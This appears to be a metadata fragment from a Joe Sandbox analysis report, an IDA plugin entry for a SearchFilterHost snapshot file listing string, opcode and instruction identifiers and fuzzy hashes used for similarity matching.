                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_8_2_5140000_SearchFilterHost.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$@
                                                                                                  • API String ID: 0-1194432280
                                                                                                  • Opcode ID: 88f4411fd05bef8d6bed2bc1bf4aa7706433207ed59c4380de55595df548e2dc
                                                                                                  • Instruction ID: e819c5fc3956575d70fe5b5c8b872caf14c711d48cc77cc728ad737ff92abce7
                                                                                                  • Opcode Fuzzy Hash: 88f4411fd05bef8d6bed2bc1bf4aa7706433207ed59c4380de55595df548e2dc
                                                                                                  • Instruction Fuzzy Hash: B1811C75D002699BDB35DB54CC49BEEB7B9AF08750F0041DAE91AB7280E7705E85CFA0